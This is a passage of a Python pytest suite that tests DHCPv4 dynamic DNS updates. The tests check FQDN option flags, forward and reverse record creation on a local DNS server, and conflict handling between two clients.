srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.exae.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.exae.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_notenabled_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', False)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n # Response option 81 MUST contain flags 10. #later make it \'s\' \'n\' and \'o\' should be 10\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_update\ndef test_ddns4_notsig_forw_and_rev_update_success_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_setup()\n srv_control.start_srv(\'DHCP\', \'stopped\')\n srv_control.clear_some_data(\'leases\')\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_two_dhci_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client1.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client1.four.example.com.\')\n\n # Client 2 add\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client2.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client2.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client2.four.example.com.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_dhci_conflicts_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client1.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'client1.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n # Client 2 add\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client2.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client2.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client2.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'client2.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n # Client 2 try to update client\'s 1 domain\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client1.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client1.four.example.com.\')\n\n # address and domain name should not be changed!\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'client1.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_add_success_withoutflag_override_client():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'override-client-update\', True)\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 3)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', 